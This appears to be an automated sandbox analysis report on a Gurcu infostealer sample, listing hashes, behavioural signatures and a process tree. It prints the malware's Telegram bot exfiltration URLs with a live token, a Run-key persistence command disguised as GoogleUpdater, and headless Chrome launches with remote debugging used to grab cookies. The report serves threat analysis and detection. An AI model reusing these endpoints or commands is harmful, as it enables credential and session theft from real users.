Analysis
-
max time kernel
135s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
06/04/2025, 19:43
Static task
static1
Behavioral task
behavioral1
Sample
generated30.exe
Resource
win10v2004-20250314-en
General
-
Target
generated30.exe
-
Size
938KB
-
MD5
2517b502d7714a4e384044a0b6c2a157
-
SHA1
aa974d57b3b42a1a72afbe2520ae7333e35d7531
-
SHA256
66fc943f11f465b81234c1fd1a9dfecb87082fe2560a0b1865c2679a927c76c0
-
SHA512
f3a87225fecced58e540bab65087e45f7340307b77673e566e7074354cf3f4668815ce56bf5f04fc6dba847a0330fc89cc7c8a4ca48d2b725e39a564f4ae46aa
-
SSDEEP
24576:q7DB0lkqjVnlqud+/2P+A0+lyv0PTVbUkIaMUcfL8lNsO:q7F0lkqXfd+/9AHly8Pv6Ucz8
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendMessage?chat_id=6565043849
https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendDocument?chat_id=6565043849&caption=%F0%9F%A5%A0Cookies%20from%20these%20websites%20%5Bgmail.com%20youtube.com%20%5D%20were%20successfully%20grabbed%20from%20the%20Default%20profile%20of%20Microsoft%20Edg
https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/getUpdates?offset=-
Signatures
-
Gurcu family
-
Uses browser remote debugging 2 TTPs 17 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1088 chrome.exe 632 msedge.exe 4508 msedge.exe 5620 msedge.exe 3920 msedge.exe 4128 chrome.exe 2472 chrome.exe 3164 chrome.exe 5624 msedge.exe 2708 msedge.exe 5552 chrome.exe 2968 chrome.exe 2896 msedge.exe 2932 msedge.exe 5164 chrome.exe 4448 chrome.exe 1908 msedge.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation generated30.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 2 IoCs
pid Process 4820 svchost.exe 5844 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdater = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdater\\svchost.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 8 raw.githubusercontent.com 9 raw.githubusercontent.com 30 raw.githubusercontent.com 40 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4924 tasklist.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\lo\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\bn\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\gl\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\am\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\es\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\en_US\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\hi\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\pa\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\it\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\sl\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\fr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\ka\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\no\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\kk\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\hu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\zh_CN\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\si\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\vi\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\my\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\et\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\ms\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\ur\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\is\messages.json msedge.exe File created C:\Program Files\msedge_url_fetcher_632_809632238\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\offscreendocument.html msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\sr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\zh_HK\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\kn\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\id\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\service_worker_bin_prod.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\th\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\ta\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\fi\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\ko\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\el\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\en\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\sk\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\dasherSettingSchema.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\bg\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\pt_PT\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\ja\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\cs\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\pt_BR\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\en_GB\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\hy\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\az\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\es_419\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\pl\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\uk\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\da\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\sv\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\ca\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\cy\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\iw\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\ro\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\fil\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\sw\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\ru\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\zu\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\mr\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\de\messages.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping632_1015769748\_locales\nl\messages.json msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4800 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133884422409020692" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-308834014-1004923324-1191300197-1000\{ADEC49A9-0E3D-44CE-9943-6004AE4229AA} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-308834014-1004923324-1191300197-1000\{23AB6038-D376-4ED7-B070-15A6CB89FCDB} msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5548 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 2856 generated30.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 4820 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe 5844 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2856 generated30.exe Token: SeDebugPrivilege 4924 tasklist.exe Token: SeDebugPrivilege 4820 svchost.exe Token: SeDebugPrivilege 5844 svchost.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe Token: SeShutdownPrivilege 5552 chrome.exe Token: SeCreatePagefilePrivilege 5552 chrome.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 5552 chrome.exe 632 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2856 wrote to memory of 4480 2856 generated30.exe 94 PID 2856 wrote to memory of 4480 2856 generated30.exe 94 PID 4480 wrote to memory of 3436 4480 cmd.exe 96 PID 4480 wrote to memory of 3436 4480 cmd.exe 96 PID 4480 wrote to memory of 4924 4480 cmd.exe 97 PID 4480 wrote to memory of 4924 4480 cmd.exe 97 PID 4480 wrote to memory of 4832 4480 cmd.exe 98 PID 4480 wrote to memory of 4832 4480 cmd.exe 98 PID 4480 wrote to memory of 4800 4480 cmd.exe 99 PID 4480 wrote to memory of 4800 4480 cmd.exe 99 PID 4480 wrote to memory of 4820 4480 cmd.exe 101 PID 4480 wrote to memory of 4820 4480 cmd.exe 101 PID 4820 wrote to memory of 4676 4820 svchost.exe 104 PID 4820 wrote to memory of 4676 4820 svchost.exe 104 PID 4676 wrote to memory of 5548 4676 cmd.exe 106 PID 4676 wrote to memory of 5548 4676 cmd.exe 106 PID 4532 wrote to memory of 5844 4532 cmd.exe 109 PID 4532 wrote to memory of 5844 4532 cmd.exe 109 PID 4820 wrote to memory of 5552 4820 svchost.exe 110 PID 4820 wrote to memory of 5552 4820 svchost.exe 110 PID 5552 wrote to memory of 5644 5552 chrome.exe 111 PID 5552 wrote to memory of 5644 5552 chrome.exe 111 PID 5552 wrote to memory of 5956 5552 chrome.exe 112 PID 5552 wrote to memory of 5956 5552 chrome.exe 112 PID 5552 wrote to memory of 1396 5552 chrome.exe 113 PID 5552 wrote to memory of 1396 5552 chrome.exe 113 PID 5552 wrote to memory of 2440 5552 chrome.exe 114 PID 5552 wrote to memory of 2440 5552 chrome.exe 114 PID 5552 wrote to memory of 4128 5552 chrome.exe 115 PID 5552 wrote to memory of 4128 5552 chrome.exe 115 PID 5552 wrote to memory of 1088 5552 chrome.exe 117 PID 5552 wrote to memory of 1088 5552 chrome.exe 117 PID 5552 wrote to memory of 5164 5552 chrome.exe 118 PID 5552 wrote to memory of 5164 5552 chrome.exe 118 PID 5552 wrote to memory of 2472 5552 chrome.exe 119 PID 5552 wrote to memory of 2472 5552 chrome.exe 119 PID 5552 wrote to memory of 6112 5552 chrome.exe 120 PID 5552 wrote to memory of 6112 5552 chrome.exe 120 PID 5552 wrote to memory of 3368 5552 chrome.exe 121 PID 5552 wrote to memory of 3368 5552 chrome.exe 121 PID 5552 wrote to memory of 2692 5552 chrome.exe 123 PID 5552 wrote to memory of 2692 5552 chrome.exe 123 PID 5552 wrote to memory of 4448 5552 chrome.exe 124 PID 5552 wrote to memory of 4448 5552 chrome.exe 124 PID 5552 wrote to memory of 3164 5552 chrome.exe 125 PID 5552 wrote to memory of 3164 5552 chrome.exe 125 PID 5552 wrote to memory of 2968 5552 chrome.exe 126 PID 5552 wrote to memory of 2968 5552 chrome.exe 126 PID 5552 wrote to memory of 3420 5552 chrome.exe 136 PID 5552 wrote to memory of 3420 5552 chrome.exe 136 PID 5552 wrote to memory of 868 5552 chrome.exe 137 PID 5552 wrote to memory of 868 5552 chrome.exe 137 PID 5552 wrote to memory of 4652 5552 chrome.exe 138 PID 5552 wrote to memory of 4652 5552 chrome.exe 138 PID 4820 wrote to memory of 632 4820 svchost.exe 139 PID 4820 wrote to memory of 632 4820 svchost.exe 139 PID 632 wrote to memory of 2492 632 msedge.exe 140 PID 632 wrote to memory of 2492 632 msedge.exe 140 PID 632 wrote to memory of 4000 632 msedge.exe 141 PID 632 wrote to memory of 4000 632 msedge.exe 141 PID 632 wrote to memory of 5948 632 msedge.exe 142 PID 632 wrote to memory of 5948 632 msedge.exe 142 PID 632 wrote to memory of 4440 632 msedge.exe 143 PID 632 wrote to memory of 4440 632 msedge.exe 143
Processes
-
C:\Users\Admin\AppData\Local\Temp\generated30.exe"C:\Users\Admin\AppData\Local\Temp\generated30.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp683F.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp683F.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:3436
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 2856"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:4832
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:4800
-
-
C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe"C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdater /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe /f4⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdater /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:5548
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --no-sandbox --disable-gpu4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5552 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff995c1dcf8,0x7ff995c1dd04,0x7ff995c1dd105⤵PID:5644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2056,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2040 /prefetch:25⤵PID:5956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2084,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2080 /prefetch:35⤵PID:1396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2360,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2356 /prefetch:85⤵PID:2440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2964,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2960 /prefetch:15⤵
- Uses browser remote debugging
PID:4128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3004,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2996 /prefetch:15⤵
- Uses browser remote debugging
PID:1088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3736,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3712 /prefetch:25⤵
- Uses browser remote debugging
PID:5164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4104,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4100 /prefetch:15⤵
- Uses browser remote debugging
PID:2472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4620,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4616 /prefetch:85⤵PID:6112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4724,i,18060722455993188620,2959624084966403611,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4584 /prefetch:85⤵PID:3368
-
-
